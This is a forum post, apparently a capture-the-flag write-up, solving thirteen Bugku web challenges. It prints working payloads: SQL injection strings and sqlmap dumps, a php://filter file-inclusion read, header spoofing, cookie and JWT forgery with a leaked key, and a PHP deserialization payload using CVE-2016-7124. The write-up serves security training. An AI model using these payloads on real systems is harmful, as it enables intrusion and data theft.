[Writeup] CTF论剑场 Web1-13 WriteUp

[复制链接]
查看16416 | 回复0 | 2019-4-3 16:59:04 | 显示全部楼层 |阅读模式

作者:3ND

平台地址:https://new.bugku.com/

web1 simple bypass

img

extract — 从数组中将变量导入到当前的符号表,trim — 去除字符串首尾处的空白字符(或者其他字符)。

Payload: a=&b=即可成功绕过,回显 flag{c3fd1661da5efb989c72b91f3c378759}

web2 Quick calc

  1. <html>
  2. <head>
  3. <title></title>
  4. </head>
  5. <body>
  6. <p>
  7. 请在三秒之内计算出以下式子,计算正确就的到flag哦!<br/>
  8. 418*693117+32*(9976+2487)</p>
  9. <form action="" method="post">
  10. 计算结果:<input type="text" name="result"/>
  11. <input type="submit" value="提交"/>
  12. </form>
  13. </body>
  14. </html>

Payload:

  1. import re
  2. import requests
  3. url = 'http://123.206.31.85:10002/'
  4. r = requests.session()
  5. text = r.get(url).text
  6. calc = str(re.findall("(.*?)</p>", text))[2:-2]
  7. ans = eval(calc)
  8. data = {'result':ans}
  9. res = r.post(url, data)
  10. print(res.text)

即可获得 flag{b37d6bdd7bb132c7c7f6072cd318697c}

web3 php伪协议

img

尝试上传 php文件时回显 Sorry,only PNG files are allowed.

判断为服务端白名单验证,这里参考 upload-labs题解思路进行测试。

img

测试无果,发现 urlop参数首页为 op=home上传页面为 op=upload,猜测存在文件包含漏洞~

op=1回显: Errornosuch page

参考: php 伪协议

使用php伪协议尝试传参: ?op=php://filter/read=convert.base64-encode/resource=flag,回显 PD9waHAgCiRmbGFnPSJmbGFne2UwMGY4OTMxMDM3Y2JkYjI1ZjZiMWQ4MmRmZTU1NTJmfSI7IAo/Pgo=

Base64 decode:

  1. <?php
  2. $flag="flag{e00f8931037cbdb25f6b1d82dfe5552f}";
  3. ?>

web4 万能密码

img

Payload: 万能密码, 注入点在password, password=' or '1'='1成功登陆。

flag{7ae7de60f14eb3cbd9403a0c4328598d}

web5 injection

hint: injection

img

  1. > sqlmap -u "http://47.95.208.167:10005/?mod=read&id=1" -p "id" -v 3
  2. Parameter: id (GET)
  3. Type: boolean-based blind
  4. Title: AND boolean-based blind - WHERE or HAVING clause
  5. Payload: mod=read&id=2 AND 6548=6548
  6. Vector: AND [INFERENCE]
  7. Type: AND/OR time-based blind
  8. Title: MySQL >= 5.0.12 RLIKE time-based blind
  9. Payload: mod=read&id=2 RLIKE SLEEP(5)
  10. Vector: RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))
  11. Type: UNION query
  12. Title: Generic UNION query (NULL) - 4 columns
  13. Payload: mod=read&id=-1362 UNION ALL SELECT NULL,CONCAT(0x716b706b71,0x6b705a4550514d7864627845624c7252716d53456758474165446c66654e4a6b43714d776b767255,0x716b6a6b71),NULL,NULL-- vymr
  14. Vector: UNION ALL SELECT NULL,[QUERY],NULL,NULL[GENERIC_SQL_COMMENT]
  15. ---
  16. [21:03:29] [INFO] the back-end DBMS is MySQL
  17. web application technology: Nginx
  18. back-end DBMS: MySQL >= 5.0.12
  19. ...
  20. > sqlmap -u "http://47.95.208.167:10005/?mod=read&id=1" -p "id" -v 3 -D "web5" -T "flag" -C "flag" --dump
  21. Database: web5
  22. Table: flag
  23. [1 entry]
  24. +----------------------------------------+
  25. | flag |
  26. +----------------------------------------+
  27. | flag{320dbb1c03cdaaf29d16f9d653c88bcb} |
  28. +----------------------------------------+

web6 XFF、F12

img

提交 user=admin' or '1'='1pass=' or '1'='1后回显:IP禁止访问,请联系本地管理员登陆,IP已被记录.

猜想 X-Forward-For:127.0.0.1,这里通过Firefox插件X-Forwarded-For Header直接修改。

提交 user=admin&pass=admin/ user=amdin&pass=1后回显:Invalid credentials! Please try again!

F12查看源代码在5023行: <!-- dGVzdDEyMw== -->

base64.decode后得到密码 test123

登陆后回显: Theflagis:85ff2ee4171396724bae20c0bd851f6b.

web7 吃个小饼干吗?

吃个小饼干吗?

img

注册测试用户后登陆, home.php页面如下:

img

任意内容提交回显相同页面。

想起小饼干的翻译是cookie,在报文中发现如下cookie字段:

  1. Set-Cookie: u=351e76680321232f297a57a5a743894a0e4a801fc3
  2. Set-Cookie: r=351e766803d63c7ede8cb1e1c8db5e51c63fd47cff
  3. # 规律如下
  4. Set-Cookie: u=351e766803 21232f297a57a5a743894a0e4a801fc3
  5. Set-Cookie: r=351e766803 d63c7ede8cb1e1c8db5e51c63fd47cff
  6. # md5(admin, 32) = 21232f297a57a5a743894a0e4a801fc3
  7. # d63c7ede8cb1e1c8db5e51c63fd47cff 解密明文为 limited

尝试cookie欺骗~

img

web8 SimpleSQLI

img

注册测试账户后,个人信息更新页面如下:

img

dirsearch下发现有 /.idea/workspace.xml泄露以及 www.tar.gz源码文件。

img

update.php中age处存在数字型注入点,payload如下:

  1. # 直接回显
  2. (select group_concat(description) from (select description from users where username=0x61646d696e)x)
  3. # 逐位爆破(注意csrf-token的处理)
  4. 0|conv(hex(substr((select description from (select * from users where username like 0x61646d696e)a),1,1)), 16, 10)
  5. conv(hex(substr((select description from (select * from users where username regexp 0x61646d696e limit 0,1)a),1,1)), 16, 10)

img

web9 PUT me message!

put me a message bugku then you can get the flag

img

Base64.decode->flag{T7l8xs9fc1nct8NviPTbn3fG0dzX9V}.

web10 在线日记本

hint:JWT你需要了解一哈.

img

img

base32.decode("NNVTU23LGEZDG===")=kk:kk123,username=kk&password=kk123提交登录。

img

img

下载 L3yx.php.swp文件,通过 vi-r L3yx.php:wq还原文件。

  1. <html>
  2. <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
  3. <title>在线日记本</title>
  4. <form action="" method="POST">
  5. <p>username: <input type="text" name="username" /></p>
  6. <p>password: <input type="password" name="password" /></p>
  7. <input type="submit" value="login" />
  8. </form>
  9. <!--hint:NNVTU23LGEZDG===-->
  10. </html>
  11. <?php
  12. error_reporting(0);
  13. require_once 'src/JWT.php';
  14. const KEY = 'L3yx----++++----';
  15. function loginkk()
  16. {
  17. $time = time();
  18. $token = [
  19. 'iss'=>'L3yx',
  20. 'iat'=>$time,
  21. 'exp'=>$time+5,
  22. 'account'=>'kk'
  23. ];
  24. $jwt = \Firebase\JWT\JWT::encode($token,KEY);
  25. setcookie("token",$jwt);
  26. header("location:user.php");
  27. }
  28. if(isset($_POST['username']) && isset($_POST['password']) && $_POST['username']!='' && $_POST['password']!='')
  29. {
  30. if($_POST['username']=='kk' && $_POST['password']=='kk123')
  31. {
  32. loginkk();
  33. }
  34. else
  35. {
  36. echo "账号或密码错误";
  37. }
  38. }
  39. ?>

JWT学习参考:JSON Web Token 入门教程 - 阮一峰

获取 Key='L3yx----++++----',使用 kk账户登录得到:

  1. # Header.Payload.Signature
  2. token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJMM3l4IiwiaWF0IjoxNTUxOTY1ODIxLCJleHAiOjE1NTE5NjU4MjYsImFjY291bnQiOiJrayJ9.ImnDWj4kYTxYyGfrOt-M0LCSwYSC8VtjdTfP03MLOyg
  3. # Header
  4. eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.
  5. # Payload
  6. eyJpc3MiOiJMM3l4IiwiaWF0IjoxNTUxOTY1ODIxLCJleHAiOjE1NTE5NjU4MjYsImFjY291bnQiOiJrayJ9.
  7. # Signature
  8. ImnDWj4kYTxYyGfrOt-M0LCSwYSC8VtjdTfP03MLOyg

img

更改account为L3yx,提前计算好iat和exp构造Token发包到user.php~

img

img

web11 MD5截断比较

  1. <html>
  2. <title>robots</title>
  3. <body>
  4. We han't anything!
  5. </body>
  6. </html>

访问 .robots发现:Disallow: /shell.php,打开/shell.php.

img

可知为md5截断比较~ 每次刷新页面匹配值会改变,这里采用短时间生成大量MD5,牺牲空间来换取时间~

  1. # -*- coding: utf-8 -*-
  2. import hashlib
  3. sum = []
  4. j = 0
  5. f = open("gen_md5.txt", "a")
  6. for i in xrange(1000000000):
  7. tmp = (hashlib.md5(str(i)).hexdigest(),i)
  8. sum.append(tmp)
  9. j = j+1
  10. if(j==10000000):
  11. for i in sum:
  12. f.write("{0} {1}".format(i,"\n"))
  13. j=0
  14. sum = []
  15. f.close()

执行命令正则匹配: cat gen_md5.txt|grep \(\'str检索符合的MD5~

img

得到:flag{e2f86fb5f75da4999e6f4957d89aaca0}.

web12 unserialize

hint:时间好长啊

img

F12检查源代码发现注释掉的PHP代码:

  1. class Time{
  2. public $flag = ******************;
  3. public $truepassword = ******************;
  4. public $time;
  5. public $password ;
  6. public function __construct($tt, $pp) {
  7. $this->time = $tt;
  8. $this->password = $pp;
  9. }
  10. function __destruct(){
  11. if(!empty($this->password))
  12. {
  13. if(strcmp($this->password,$this->truepassword)==0){
  14. echo "<h1>Welcome,you need to wait......<br>The flag will become soon....</h1><br>";
  15. if(!empty($this->time)){
  16. if(!is_numeric($this->time)){
  17. echo 'Sorry.<br>';
  18. show_source(__FILE__);
  19. }
  20. else if($this->time < 11 * 22 * 33 * 44 * 55 * 66){
  21. echo 'you need a bigger time.<br>';
  22. }
  23. else if($this->time > 66 * 55 * 44 * 33 * 23 * 11){
  24. echo 'you need a smaller time.<br>';
  25. }
  26. else{
  27. sleep((int)$this->time);
  28. var_dump($this->flag);
  29. }
  30. echo '<hr>';
  31. }
  32. else{
  33. echo '<h1>you have no time!!!!!</h1><br>';
  34. }
  35. }
  36. else{
  37. echo '<h1>assword is wrong............</h1><br>';
  38. }
  39. }
  40. else{
  41. echo "<h1>lease input password..........</h1><br>";
  42. }
  43. }
  44. function __wakeup(){
  45. $this->password = 1; echo 'hello hacker,I have changed your password and time, rua!';
  46. }
  47. }
  48. if(isset($_GET['rua'])){
  49. $rua = $_GET['rua'];
  50. @unserialize($rua);
  51. }
  52. else{
  53. echo "<h1>lease don't stop rua 233333</h1><br>";
  54. }

典型的 PHP反序列化题目,可以参考:PHP反序列化由浅入深学习了解~

简单审计思路:通过GET传值 rua后进行反序列化, unserialize() 会检查是否存在一个 wakeup() 方法。如果存在,则会先调用 __wakeup 方法,预先准备对象需要的资源。destruct()会在对象的所有引用都被删除或者当对象被显式销毁时执行,想要获取 flag,我们需要 rua满足一下条件:

  • strcmp($this->password,$this->truepassword)==0
  • $this->time < 11 * 22 * 33 * 44 * 55 * 66 & $this->time > 66 * 55 * 44 * 33 * 23 * 11
  • sleep((int)$this->time)

绕过方法:

  • 绕过wakeup的执行(CVE-2016-7124):*当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过wakeup的执行*,修改对象属性个数。
  • 绕过strcmp: Php5.3之后版本使用strcmp比较一个字符串和数组的话,将不再返回-1而是返回0,构造password数组。
  • 绕过sleep(): (1)使用16进制表示 0x开头,强制类型转化时会转化为 0;(2)使用科学计数法绕过, 1.3E9

img

构造脚本:

  1. <?php
  2. class Time{
  3. public $time;
  4. public $password;
  5. public function __construct($tt, $pp) {
  6. $this->time = $tt;
  7. $this->password = $pp;
  8. }
  9. }
  10. $array = array(
  11. 0 => "bar",
  12. 1 => "foo",
  13. );
  14. $time = '0x4d7c6d00';
  15. $rua = new Time($time, $array);
  16. echo serialize($rua);
  17. //O:4:"Time":2:{s:4:"time";s:10:"0x4d7c6d00";s:8:"password";a:2:{i:0;s:3:"bar";i:1;s:3:"foo";}}
  18. ?>

Payload: rua=O:4:"Time":3:{s:4:"time";s:10:"0x4d7c6d00";s:8:"password";a:2:{i:0;s:3:"bar";i:1;s:3:"foo";}}.

img

web13 to be faster

img

用BurpSuite抓包分析如下:

img

在response Header头里发现了 PasswordHint字段,base64解密 Password后得到flag{f4970aacbacfba9e57ddbf998fa2e29d},提交错误~

Hint: Seeing is not believing, maybe you need to be faster!

尝试将Password解密后flag{}里面包含的字段提交回显如下:

img

推测需要先发送一个请求截取Password字段,然后base解密取flag{}内包含的值作为password的值发包,速度要快。

Payload:

  1. import requests
  2. import base64
  3. url = 'http://123.xxx.xxx.85:10013/index.php'
  4. r = requests.session()
  5. r1 = r.post(url, data = {'password':'flag'})
  6. Password = r1.headers['Password']
  7. password = str(base64.b64decode(Password), 'utf-8')[5:-1]
  8. r2 = r.post(url, data = {'password':password})
  9. print(r2.text)

img

有人的地方就有江湖。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

93

主题

224

帖子

3164

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
3164